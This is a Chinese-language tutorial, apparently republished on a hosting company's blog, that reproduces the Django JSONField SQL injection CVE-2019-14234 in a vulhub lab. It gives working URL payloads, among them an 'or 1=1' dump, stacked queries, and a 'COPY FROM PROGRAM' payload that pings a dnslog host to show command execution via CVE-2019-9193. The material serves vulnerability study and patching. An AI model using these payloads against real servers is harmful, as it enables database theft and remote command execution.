怎么进行CVE-2019-14234 Django JSONField SQL注入漏洞复现的解析

发布时间:2021-12-14 10:13:52 作者:柒染
来源:亿速云 阅读:255

怎么进行CVE-2019-14234 Django JSONField SQL注入漏洞复现的解析,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。

0x01简介

Django是一款广为流行的开源web框架,由Python编写,许多网站和app都基于Django开发。

什么是JSONField,Django是一个大而全的Web框架,其支持很多数据库引擎,包括Postgresql、Mysql、Oracle、Sqlite3等,但与Django天生为一对儿的数据库莫过于Postgresql了,Django官方也建议配合Postgresql一起使用。

相比于Mysql,Postgresql支持的数据类型更加丰富,其对JSON格式数据的支持也让这个关系型数据库拥有了NoSQL的一些特点。

0x02漏洞简介

该漏洞需要开发者使用了JSONField/HStoreField,且用户可控queryset查询时的键名,在键名的位置注入SQL语句。

Django通常搭配postgresql数据库,而JSONField是该数据库的一种数据类型。该漏洞的出现的原因在于Django中JSONField类的实现,Django的model最本质的作用是生成SQL语句,而在Django通过JSONField生成sql语句时,是通过简单的字符串拼接。

通过JSONField类获得KeyTransform类并生成sql语句的位置。

其中key_name是可控的字符串,最终生成的语句是WHERE (field->’[key_name]’) =

‘value’,因此可以进行SQL注入。怎么进行CVE-2019-14234 Django JSONField SQL注入漏洞复现的解析

0x03影响版本

Django 主开发分支

Django 2.2.x < 2.2.4

Django 2.1.x < 2.1.11

Django 1.11.x < 1.11.23

0x04环境搭建

使用vulhub的docker环境搭建

vulhub下载地址:https://github.com/vulhub/vulhub

cd vulhub/django/CVE-2019-14234/

docker-compose up -d

怎么进行CVE-2019-14234 Django JSONField SQL注入漏洞复现的解析

在浏览器访问http://ip:8000出现一下页面说明搭建成功怎么进行CVE-2019-14234 Django JSONField SQL注入漏洞复现的解析

0x05漏洞利用

通过对代码的分析,可以知道如果在你的Django中使用了JSONField并且查询的“键名”可控,就可以进行SQL注入

访问http://ip:8000/admin

输入用户名admin ,密码a123123123

 怎么进行CVE-2019-14234 Django JSONField SQL注入漏洞复现的解析

然后构造URL进行查询,payload:

http://ip:8000/admin/vuln/collection/?detail__a'b=123

 怎么进行CVE-2019-14234 Django JSONField SQL注入漏洞复现的解析

可以看到上图已经注入成功,并且可以看到构造的SQL语句,继续构造payload

http://ip:8000/admin/vuln/collection/?detail__title%27)%3d%271%27 or 1%3d1%2d%2d%20

由于or 1=1永为真,因此应该返回所有结果

 怎么进行CVE-2019-14234 Django JSONField SQL注入漏洞复现的解析

我们结合CVE-2019-9193我们尝试进行命令注入,构造url如下

http://192.168.10.195:8000/admin/vuln/collection/?detail__title')%3d'1' or 1%3d1 %3bcreate table cmd_exec(cmd_output text)--%20

页面结果虽然报错,但是报错原因是no results to fetch,说明我们的语句已经执行

 怎么进行CVE-2019-14234 Django JSONField SQL注入漏洞复现的解析

使用dnslog检测是否可以执行命令

Dnslog网址:http://dnslog.cn/

Payload:

http://192.168.10.195:8000/admin/vuln/collection/?detail__title')%3d'1' or 1%3d1 %3bcopy cmd_exec FROM PROGRAM 'ping k1anij.dnslog.cn

'--%20

 怎么进行CVE-2019-14234 Django JSONField SQL注入漏洞复现的解析

成功检测到流量

 怎么进行CVE-2019-14234 Django JSONField SQL注入漏洞复现的解析

复现环境里的postgresql数据库docker没对外的端口映射,如果开了或者真实环境里,还可以结合msf通过CVE-2019-9193来getshell

0x06修复方式

更新到最新版本

看完上述内容是否对您有帮助呢?如果还想对相关知识有进一步的了解或阅读更多相关文章,请关注亿速云行业资讯频道,感谢您对亿速云的支持。

推荐阅读:
  1. 怎么利用django model save方法对未更改的字段进行保存
  2. 如何从Django Allauth中进行登录改造

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

django cve-2019-14234 jsonfield

上一篇:新型JSNEMUCOD病毒样本分析报告是怎样的

下一篇:SUSE Linux Desktop Gnome桌面快捷键有哪些

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》